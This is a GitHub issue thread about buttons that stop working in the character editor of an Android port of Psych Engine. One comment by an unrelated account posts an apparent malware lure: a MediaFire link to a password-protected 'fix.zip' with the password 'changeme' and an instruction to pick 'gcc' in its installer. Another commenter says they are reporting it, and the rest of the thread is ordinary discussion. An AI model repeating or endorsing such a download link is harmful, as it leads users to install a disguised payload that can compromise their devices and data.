### ISSUE TITLE
cannot undo buttons

### ISSUE THREAD

**Issue by RedcappedmelonYT** [MobilePorting/FNF-PsychEngine-Mobile#184]
### Describe your bug here.

so basically i was on character editor, editing my character, and all of a sudden, the buttons suddenly stopped working??

https://github.com/user-attachments/assets/f5f17234-dd12-4f2c-b1ff-6b265858b8b4

### Are you modding a build from source or with Lua?

Lua

### What is your build target?

Android

### Which psych engine version you're on?

1.0 (Prerelease)

### Did you edit anything in this build? If so, mention or summarize your changes.

No

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mcagabe19** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

I'm reporting you

**Comment by ProGamer29908** [comment]
> ### Describe your bug here.
> so basically i was on character editor, editing my character, and all of a sudden, the buttons suddenly stopped working??
> 
>  Screen_Recording_20240826_153414.mp4 
> ### Crash Log or logcat logs (if existing)
> _No response_
> 
> ### Are you modding a build from source or with Lua?
> Lua
> 
> ### What is your build target?
> Android
> 
> ### Which psych engine version you're on?
> 1.0 (Prerelease)
> 
> ### Did you edit anything in this build? If so, mention or summarize your changes.
> No

I have a question.. Is there buttons options on the port. There's only hitbox

**Comment by RedcappedmelonYT** [comment]
bro forgot to close the issue 💀

**Comment by moxie-coder** [comment]
> bro forgot to close the issue 💀

it wasn't done yet, but if you wanna be like that fine
